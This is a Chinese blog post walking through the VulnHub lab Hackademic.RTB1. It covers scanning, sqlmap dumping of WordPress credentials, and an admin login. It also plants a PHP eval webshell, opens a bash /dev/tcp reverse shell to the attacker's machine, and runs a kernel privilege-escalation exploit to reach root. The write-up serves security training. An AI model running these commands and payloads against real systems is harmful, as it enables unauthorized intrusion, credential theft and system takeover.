
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <title>Hackademic.RTB1靶机 | k-onlの狗窝</title>
    <meta name="author" content="k-onl" />
    <meta name="description" content="" />
    <meta name="keywords" content="" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" />
    <link rel="icon" href="/images/fufu1.jpg" />
    <link rel="preconnect" href="https://cdn.staticfile.org" />
<script src="https://cdn.staticfile.org/vue/3.3.7/vue.global.prod.min.js"></script>
<link rel="stylesheet" href="https://cdn.staticfile.org/font-awesome/6.4.2/css/all.min.css" />
<link rel="preconnect" href="https://fonts.loli.net" />
<link rel="preconnect" href="https://gstatic.loli.net" crossorigin />
<link rel="stylesheet" href="https://fonts.loli.net/css2?family=Fira+Code:wght@400;500;600;700&family=Lexend:wght@400;500;600;700;800;900&family=Noto+Sans+SC:wght@400;500;600;700;800;900&display=swap" />
<script> const mixins = {}; </script>

<script src="https://polyfill.io/v3/polyfill.min.js?features=default"></script>




<script src="/js/lib/preview.js"></script>









<link rel="stylesheet" href="/css/main.css" />

<meta name="generator" content="Hexo 7.0.0"></head>
<body>
    <div id="layout">
        <transition name="fade">
            <div id="loading" v-show="loading">
                <div id="loading-circle">
                    <h2>LOADING</h2>
                    <p>加载过慢请开启缓存 浏览器默认开启</p>
                    <img src="/images/lolisister1.gif" />
                </div>
            </div>
        </transition>
        <div id="menu" :class="{ hidden: hiddenMenu, 'menu-color': menuColor}">
    <nav id="desktop-menu">
        <a class="title" href="/">
            <span>K-ONLの狗窝</span>
        </a>
        
        <a href="/">
            <i class="fa-solid fa-house fa-fw"></i>
            <span>&ensp;Home</span>
        </a>
        
        <a href="/about">
            <i class="fa-solid fa-id-card fa-fw"></i>
            <span>&ensp;About</span>
        </a>
        
        <a href="/archives">
            <i class="fa-solid fa-box-archive fa-fw"></i>
            <span>&ensp;搜索</span>
        </a>
        
        <a href="/categories">
            <i class="fa-solid fa-bookmark fa-fw"></i>
            <span>&ensp;Categories</span>
        </a>
        
        <a href="/tags">
            <i class="fa-solid fa-tags fa-fw"></i>
            <span>&ensp;Tags</span>
        </a>
        
    </nav>
    <nav id="mobile-menu">
        <div class="title" @click="showMenuItems = !showMenuItems">
            <i class="fa-solid fa-bars fa-fw"></i>
            <span>&emsp;K-ONLの狗窝</span>
        </div>
        <transition name="slide">
            <div class="items" v-show="showMenuItems">
                
                <a href="/">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-house fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">Home</div>
                    </div>
                </a>
                
                <a href="/about">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-id-card fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">About</div>
                    </div>
                </a>
                
                <a href="/archives">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-box-archive fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">搜索</div>
                    </div>
                </a>
                
                <a href="/categories">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-bookmark fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">Categories</div>
                    </div>
                </a>
                
                <a href="/tags">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-tags fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">Tags</div>
                    </div>
                </a>
                
            </div>
        </transition>
    </nav>
</div>
<transition name="fade">
    <div id="menu-curtain" @click="showMenuItems = !showMenuItems" v-show="showMenuItems"></div>
</transition>

        <div id="main" :class="loading ? 'into-enter-from': 'into-enter-active'">
            <div class="article">
    <div>
        <h1>Hackademic.RTB1靶机</h1>
    </div>
    <div class="info">
        <span class="date">
            <span class="icon">
                <i class="fa-solid fa-calendar fa-fw"></i>
            </span>
            2024/1/20
        </span>
        
        
    </div>
    
    <div class="content" v-pre>
        <h2 id="一、靶场下载地址"><a href="#一、靶场下载地址" class="headerlink" title="一、靶场下载地址"></a>一、靶场下载地址</h2><p><a target="_blank" rel="noopener" href="https://www.vulnhub.com/entry/hackademic-rtb1,17/">https://www.vulnhub.com/entry/hackademic-rtb1,17/</a></p>
<h2 id="二、开始打靶"><a href="#二、开始打靶" class="headerlink" title="二、开始打靶"></a>二、开始打靶</h2><p>1、获取靶机ip<br>我们得到的靶机只有mac地址没有IP，需要查找ip</p>
<p>靶机和kali都需要设置nat</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">arp-scan -l -I eth1</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20240120232910614.png" alt="image-20240120232910614"></p>
<p>2、扫端口、目录<br>我们获取了靶机的IP是192.168.86.144，接下来就是老套路，扫端口、扫目录</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">nmap -p 1-1000 192.168.86.144     //扫这个ip的1-1000个端口</span><br><span class="line"></span><br><span class="line">dirsearch -u &quot;http://192.168.86.144/&quot; -x 403,404   # 目录扫描</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20240120233008987.png" alt="image-20240120233008987"></p>
<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20240120233245363.png" alt="image-20240120233245363"></p>
<p>在http页面发现一个新目录</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.86.144/Hackademic_RTB1</span><br></pre></td></tr></table></figure>

<p>用dirseach扫描该目录</p>
<p>用dirseach扫描该目录</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">dirsearch -u &quot;http://192.168.86.144/Hackademic_RTB1/&quot; -x 403,404</span><br></pre></td></tr></table></figure>


<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20240120233430203.png" alt="image-20240120233430203"></p>
<p>都打开看看，<a target="_blank" rel="noopener" href="http://192.168.86.144/Hackademic_RTB1/wp-login.php%EF%BC%8C%E4%BD%86%E6%98%AF%E6%B2%A1%E6%9C%89%E8%B4%A6%E5%8F%B7%E5%AF%86%E7%A0%81">http://192.168.86.144/Hackademic_RTB1/wp-login.php，但是没有账号密码</a></p>
<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20240120233439516.png" alt="image-20240120233439516"></p>
<p>3、访问80端口<br>东点点，西点点，我们发现一个新的目录和sql注入点</p>
<p>浏览发现有p和cat两个地方可以传参，p的sql注入失败了，那就从cat下手</p>
<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20240120233456915.png" alt="image-20240120233456915"></p>
<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20240120233504405.png" alt="image-20240120233504405"></p>
<p>发现有注入点，直接放sqlmap里面爆破</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u &quot;http://192.168.86.144/Hackademic_RTB1/?cat=1%27&quot;  --dbs --batch  //爆库</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20240120233520448.png" alt="image-20240120233520448"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">sqlmap  -u &quot;http://192.168.86.144/Hackademic_RTB1/?cat=1&quot; --batch -D  wordpress --tables</span><br><span class="line">//爆表</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20240120233615621.png" alt="image-20240120233615621"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap  -u &quot;http://192.168.86.144/Hackademic_RTB1/?cat=1&quot;  --batch -D wordpress -T wp_users --column     //爆列</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20240120233653554.png" alt="image-20240120233653554"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap  -u &quot;http://192.168.86.144/Hackademic_RTB1/?cat=1&quot;  --batch -D wordpress -T wp_users  -C &quot;user_login,user_pass&quot; --dump</span><br></pre></td></tr></table></figure>

<p>&#x2F;&#x2F;爆名字段     –dump参数表示将从数据库中获取的数据进行输出。<br><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20240120233721116.png" alt="image-20240120233721116"></p>
<p>5、登陆<br>将得到的账号密码输入到登陆页面</p>
<p>有些账号是有管理员权限的有的没有</p>
<p>我们登陆NickJames admin</p>
<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20240120233739071.png" alt="image-20240120233739071"></p>
<p>6、文件上传漏洞<br>找一找有没有什么文件上传的漏洞</p>
<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20240120233748224.png" alt="image-20240120233748224"></p>
<p>在hello.php中插入一句话木马，然后使用蚁剑连接一下,连接成功</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php @eval($_POST[a]) ?&gt;</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20240120233803689.png" alt="image-20240120233803689"></p>
<p>我们点击终端</p>
<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20240120233810329.png" alt="image-20240120233810329"></p>
<p>输入whoami查看当前有效的用户名称，发现是apache，权限等级甚至低于普通用户，我们的下一步操作是提升权限</p>
<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20240120233820546.png" alt="image-20240120233820546"></p>
<p>7、提升权限<br>这里我们需要利用到反弹shell</p>
<p>先在kali里面输入</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -lvvp 4444 //监听端口</span><br></pre></td></tr></table></figure>

<p>然后到蚁剑终端输入</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">bash -i &gt;&amp; /dev/tcp/192.168.86.129/4444 0&gt;&amp;1  //反弹shell</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20240120233918188.png" alt="image-20240120233918188"></p>
<p>kali就会进入到操作界面，在这里进行提权操作</p>
<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20240120233926274.png" alt="image-20240120233926274"></p>
<p>这里的bash不太好用，我们给他升级一下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">python -c &#x27;import pty; pty.spawn(&quot;/bin/bash&quot;)&#x27;     </span><br><span class="line">ctrl  z </span><br><span class="line">stty raw -echo;fg;reset </span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20240120233944907.png" alt="image-20240120233944907"></p>
<p>现在正是进行提权操作，升到root权限</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">uname -a            //用于显示系统信息的命令</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>这里显示linux版本为2.6.3，所以查看2.6.3版本的系统漏洞脚本</p>
<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20240120234032762.png" alt="image-20240120234032762"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">searchsploit  2.6.3|grep Local</span><br><span class="line"></span><br><span class="line">//  searchsploit 2.6.3 | grep Local 是在使用Exploit Database的搜索工具 searchsploit 来查找特定版本（2.6.3）的漏洞利用脚本，并使用 grep 过滤本地（Local）漏洞的结果。</span><br><span class="line"></span><br></pre></td></tr></table></figure>



<p>选择rc版本高一点的</p>
<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20240120234249696.png" alt="image-20240120234249696"></p>
<p>我们可以看到tmp目录下成功生成了，把15285.c复制到蚁剑的tmp目录下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">cd /tmp</span><br><span class="line">cp /usr/share/exploitdb/exploits/linux/local/15285.c ./</span><br><span class="line">ls</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20240120234318670.png" alt="image-20240120234318670"></p>
<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20240120234323769.png" alt="image-20240120234323769"></p>
<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20240120234329066.png" alt="image-20240120234329066"></p>
<p>最后我们输入下面几行代码，即可顺利拿到root权限</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">gcc -o exp 15285.c</span><br><span class="line"></span><br><span class="line">//这个命令 gcc -o exp 15285.c 用于编译一个名为 exp 的可执行文件，该文件的源代码是 15285.c</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">chmod 777 exp  //给权限</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">./exp</span><br><span class="line"></span><br><span class="line">//运行 ./exp 命令将尝试执行名为 exp 的可执行文件</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20240120234413825.png" alt="image-20240120234413825"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cat /root/key.txt</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20240120234419765.png" alt="image-20240120234419765"></p>

    </div>
    
    
    
    
    
    
    
</div>

            <footer id="footer">
    <div id="footer-wrap">
        <div>
            &copy;
            2022 - 2024 k-onlの狗窝
            <span id="footer-icon">
                <i class="fa-solid fa-font-awesome fa-fw"></i>
            </span>
            &commat;k-onl
        </div>
        <div>
            Based on the <a target="_blank" rel="noopener" href="https://hexo.io">Hexo Engine</a> &amp;
            <a target="_blank" rel="noopener" href="https://github.com/theme-particlex/hexo-theme-particlex">ParticleX Theme</a>
        </div>
        
    </div>
</footer>

        </div>
        
        <transition name="fade">
            <div id="preview" ref="preview" v-show="previewShow">
                <img id="preview-content" ref="previewContent" />
            </div>
        </transition>
        
    </div>
    <script src="/js/main.js"></script>
    
    




    
</body>
</html>
